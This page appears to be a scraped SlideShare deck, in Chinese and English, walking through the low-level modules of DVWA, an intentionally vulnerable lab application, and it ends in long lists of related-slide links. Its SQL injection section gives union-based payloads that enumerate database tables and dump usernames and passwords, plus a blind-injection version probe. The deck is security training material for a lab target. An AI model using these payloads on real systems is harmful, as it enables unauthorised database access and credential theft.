狠狠撸

狠狠撸Share a Scribd company logo
2
Most read
9
Most read
DVWA - Damn Vulnerable Web
Application
Dvwa low level
1.Brute Force
2.Command Injection
3.CSRF
4.File Inclusion
5.SQL Injection
SQL Injection Source
SQL 重組
$getid = "SELECT first_name, last_name FROM users WHERE user_id =
'$id'";
檢測是否有錯誤
1' and 1=1#
組合後變成
"select first_name,last_name form users where user_id = '1' and 1=1#";
5.SQL Injection
1' order by 1#
1' union all select 1,2#
1' union all select user(),database()#
1' union all select null,table_name from information_schema.tables#
1' union all select null,table_name from information_schema.tables where
table_schema = 'dvwa'#
1' union all select null,column_name from information_schema.columns where
table_schema ='dvwa'#
5.SQL Injection
1' union all select user,password from users#
6.Blind SQL Injection
差別
6.Blind SQL Injection
我們可以先
檢測版本
1' union all select null,substring(@@version,1,1)=4#
7.File Upload
8.Reflected Cross Site Scripting (XSS)
9.Stored Cross Site Scripting (XSS)
Dvwa medium level
To be continue
vance@hst.tw

More Related Content

What's hot (20)

Sécurité des applications web: attaque et défense
Antonio Fontes
?
CNIT 127 Ch 5: Introduction to heap overflows
CNIT 127 Ch 5: Introduction to heap overflows
Sam Bowne
?
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
?
Spring Security
Spring Security
Knoldus Inc.
?
Reverse proxies & Inconsistency
Reverse proxies & Inconsistency
GreenD0g
?
Penetration testing web application web application (in) security
Penetration testing web application web application (in) security
Nahidul Kibria
?
Netcat
Netcat
penetration Tester
?
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Jared Greenhill
?
Vulnerabilities in modern web applications
Vulnerabilities in modern web applications
Niyas Nazar
?
MySQL Security
MySQL Security
Ted Wennmark
?
Rapport atelier Web App Security 2015
Hamza Ben Marzouk
?
SQL injection prevention techniques
SQL injection prevention techniques
SongchaiDuangpan
?
Introduction vulnérabilité web
davystoffel
?
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and Security
Sandip Chaudhari
?
A5: Security Misconfiguration
A5: Security Misconfiguration
Tariq Islam
?
SQL Injection
SQL Injection
Adhoura Academy
?
Rapport DVWA: CSRF
Ayoub R.
?
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
Vishal Kumar
?
Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)
Daniel Tumser
?
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction
Mostafa Abdel-sallam
?
Sécurité des applications web: attaque et défense
Antonio Fontes
?
CNIT 127 Ch 5: Introduction to heap overflows
CNIT 127 Ch 5: Introduction to heap overflows
Sam Bowne
?
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
?
Reverse proxies & Inconsistency
Reverse proxies & Inconsistency
GreenD0g
?
Penetration testing web application web application (in) security
Penetration testing web application web application (in) security
Nahidul Kibria
?
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Jared Greenhill
?
Vulnerabilities in modern web applications
Vulnerabilities in modern web applications
Niyas Nazar
?
Rapport atelier Web App Security 2015
Hamza Ben Marzouk
?
SQL injection prevention techniques
SQL injection prevention techniques
SongchaiDuangpan
?
Introduction vulnérabilité web
davystoffel
?
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and Security
Sandip Chaudhari
?
A5: Security Misconfiguration
A5: Security Misconfiguration
Tariq Islam
?
Rapport DVWA: CSRF
Ayoub R.
?
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
Vishal Kumar
?
Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)
Daniel Tumser
?

Viewers also liked (20)

新手无痛入门础辫办逆向
新手无痛入门础辫办逆向
hackstuff
?
Python 網頁爬蟲由淺入淺
Python 網頁爬蟲由淺入淺
hackstuff
?
Rootkit 101
Rootkit 101
hackstuff
?
Web2.0 attack and defence
Web2.0 attack and defence
hackstuff
?
Webshell 簡單應用
Webshell 簡單應用
hackstuff
?
Algo/Crypto about CTF
Algo/Crypto about CTF
hackstuff
?
ROP 輕鬆談
ROP 輕鬆談
hackstuff
?
Android Security Development
Android Security Development
hackstuff
?
Crawler
Crawler
hackstuff
?
SQL injection duplicate error principle
SQL injection duplicate error principle
hackstuff
?
Php lfi rfi掃盲大補帖
Php lfi rfi掃盲大補帖
hackstuff
?
cmd injection
cmd injection
hackstuff
?
调试器原理与架构
调试器原理与架构
hackstuff
?
SITCON2016, 防毒擋不住?勒索軟體猖獗與實作
SITCON2016, 防毒擋不住?勒索軟體猖獗與實作
Sheng-Hao Ma
?
防毒挡不住?勒索病毒猖獗与实作
防毒挡不住?勒索病毒猖獗与实作
Sheng-Hao Ma
?
Antivirus Bypass
Antivirus Bypass
hackstuff
?
在开始工作以前,我以為我会写扣。
在开始工作以前,我以為我会写扣。
Chih-Hsuan Kuo
?
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Grand Parade Poland
?
Breakpoints
Breakpoints
Satabdi Das
?
新手无痛入门础辫办逆向
新手无痛入门础辫办逆向
hackstuff
?
Python 網頁爬蟲由淺入淺
Python 網頁爬蟲由淺入淺
hackstuff
?
Web2.0 attack and defence
Web2.0 attack and defence
hackstuff
?
Webshell 簡單應用
Webshell 簡單應用
hackstuff
?
Algo/Crypto about CTF
Algo/Crypto about CTF
hackstuff
?
Android Security Development
Android Security Development
hackstuff
?
SQL injection duplicate error principle
SQL injection duplicate error principle
hackstuff
?
Php lfi rfi掃盲大補帖
Php lfi rfi掃盲大補帖
hackstuff
?
调试器原理与架构
调试器原理与架构
hackstuff
?
SITCON2016, 防毒擋不住?勒索軟體猖獗與實作
SITCON2016, 防毒擋不住?勒索軟體猖獗與實作
Sheng-Hao Ma
?
防毒挡不住?勒索病毒猖獗与实作
防毒挡不住?勒索病毒猖獗与实作
Sheng-Hao Ma
?
Antivirus Bypass
Antivirus Bypass
hackstuff
?
在开始工作以前,我以為我会写扣。
在开始工作以前,我以為我会写扣。
Chih-Hsuan Kuo
?
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Grand Parade Poland
?
Ad

Recently uploaded (20)

Floods in Valencia: Two FME-Powered Stories of Data Resilience
Floods in Valencia: Two FME-Powered Stories of Data Resilience
Safe Software
?
High Availability On-Premises FME Flow.pdf
High Availability On-Premises FME Flow.pdf
Safe Software
?
MuleSoft for AgentForce : Topic Center and API Catalog
MuleSoft for AgentForce : Topic Center and API Catalog
shyamraj55
?
Down the Rabbit Hole – Solving 5 Training Roadblocks
Down the Rabbit Hole – Solving 5 Training Roadblocks
Rustici Software
?
Edge-banding-machines-edgeteq-s-200-en-.pdf
Edge-banding-machines-edgeteq-s-200-en-.pdf
AmirStern2
?
FIDO Alliance Seminar State of Passkeys.pptx
FIDO Alliance Seminar State of Passkeys.pptx
FIDO Alliance
?
Mastering AI Workflows with FME - Peak of Data & AI 2025
Mastering AI Workflows with FME - Peak of Data & AI 2025
Safe Software
?
FME for Distribution & Transmission Integrity Management Program (DIMP & TIMP)
FME for Distribution & Transmission Integrity Management Program (DIMP & TIMP)
Safe Software
?
Artificial Intelligence in the Nonprofit Boardroom.pdf
Artificial Intelligence in the Nonprofit Boardroom.pdf
OnBoard
?
vertical-cnc-processing-centers-drillteq-v-200-en.pdf
vertical-cnc-processing-centers-drillteq-v-200-en.pdf
AmirStern2
?
ENERGY CONSUMPTION CALCULATION IN ENERGY-EFFICIENT AIR CONDITIONER.pdf
ENERGY CONSUMPTION CALCULATION IN ENERGY-EFFICIENT AIR CONDITIONER.pdf
Muhammad Rizwan Akram
?
Oracle Cloud Infrastructure AI Foundations
Oracle Cloud Infrastructure AI Foundations
VICTOR MAESTRE RAMIREZ
?
“From Enterprise to Makers: Driving Vision AI Innovation at the Extreme Edge,...
“From Enterprise to Makers: Driving Vision AI Innovation at the Extreme Edge,...
Edge AI and Vision Alliance
?
Bridging the divide: A conversation on tariffs today in the book industry - T...
Bridging the divide: A conversation on tariffs today in the book industry - T...
BookNet Canada
?
Viral>Wondershare Filmora 14.5.18.12900 Crack Free Download
Viral>Wondershare Filmora 14.5.18.12900 Crack Free Download
Puppy jhon
?
Analysis of the changes in the attitude of the news comments caused by knowin...
Analysis of the changes in the attitude of the news comments caused by knowin...
Matsushita Laboratory
?
Data Validation and System Interoperability
Data Validation and System Interoperability
Safe Software
?
FME for Good: Integrating Multiple Data Sources with APIs to Support Local Ch...
FME for Good: Integrating Multiple Data Sources with APIs to Support Local Ch...
Safe Software
?
FIDO Seminar: Authentication for a Billion Consumers - Amazon.pptx
FIDO Seminar: Authentication for a Billion Consumers - Amazon.pptx
FIDO Alliance
?
cnc-drilling-dowel-inserting-machine-drillteq-d-510-english.pdf
cnc-drilling-dowel-inserting-machine-drillteq-d-510-english.pdf
AmirStern2
?
Floods in Valencia: Two FME-Powered Stories of Data Resilience
Floods in Valencia: Two FME-Powered Stories of Data Resilience
Safe Software
?
High Availability On-Premises FME Flow.pdf
High Availability On-Premises FME Flow.pdf
Safe Software
?
MuleSoft for AgentForce : Topic Center and API Catalog
MuleSoft for AgentForce : Topic Center and API Catalog
shyamraj55
?
Down the Rabbit Hole – Solving 5 Training Roadblocks
Down the Rabbit Hole – Solving 5 Training Roadblocks
Rustici Software
?
Edge-banding-machines-edgeteq-s-200-en-.pdf
Edge-banding-machines-edgeteq-s-200-en-.pdf
AmirStern2
?
FIDO Alliance Seminar State of Passkeys.pptx
FIDO Alliance Seminar State of Passkeys.pptx
FIDO Alliance
?
Mastering AI Workflows with FME - Peak of Data & AI 2025
Mastering AI Workflows with FME - Peak of Data & AI 2025
Safe Software
?
FME for Distribution & Transmission Integrity Management Program (DIMP & TIMP)
FME for Distribution & Transmission Integrity Management Program (DIMP & TIMP)
Safe Software
?
Artificial Intelligence in the Nonprofit Boardroom.pdf
Artificial Intelligence in the Nonprofit Boardroom.pdf
OnBoard
?
vertical-cnc-processing-centers-drillteq-v-200-en.pdf
vertical-cnc-processing-centers-drillteq-v-200-en.pdf
AmirStern2
?
ENERGY CONSUMPTION CALCULATION IN ENERGY-EFFICIENT AIR CONDITIONER.pdf
ENERGY CONSUMPTION CALCULATION IN ENERGY-EFFICIENT AIR CONDITIONER.pdf
Muhammad Rizwan Akram
?
Oracle Cloud Infrastructure AI Foundations
Oracle Cloud Infrastructure AI Foundations
VICTOR MAESTRE RAMIREZ
?
“From Enterprise to Makers: Driving Vision AI Innovation at the Extreme Edge,...
“From Enterprise to Makers: Driving Vision AI Innovation at the Extreme Edge,...
Edge AI and Vision Alliance
?
Bridging the divide: A conversation on tariffs today in the book industry - T...
Bridging the divide: A conversation on tariffs today in the book industry - T...
BookNet Canada
?
Viral>Wondershare Filmora 14.5.18.12900 Crack Free Download
Viral>Wondershare Filmora 14.5.18.12900 Crack Free Download
Puppy jhon
?
Analysis of the changes in the attitude of the news comments caused by knowin...
Analysis of the changes in the attitude of the news comments caused by knowin...
Matsushita Laboratory
?
Data Validation and System Interoperability
Data Validation and System Interoperability
Safe Software
?
FME for Good: Integrating Multiple Data Sources with APIs to Support Local Ch...
FME for Good: Integrating Multiple Data Sources with APIs to Support Local Ch...
Safe Software
?
FIDO Seminar: Authentication for a Billion Consumers - Amazon.pptx
FIDO Seminar: Authentication for a Billion Consumers - Amazon.pptx
FIDO Alliance
?
cnc-drilling-dowel-inserting-machine-drillteq-d-510-english.pdf
cnc-drilling-dowel-inserting-machine-drillteq-d-510-english.pdf
AmirStern2
?
Ad

Dvwa low level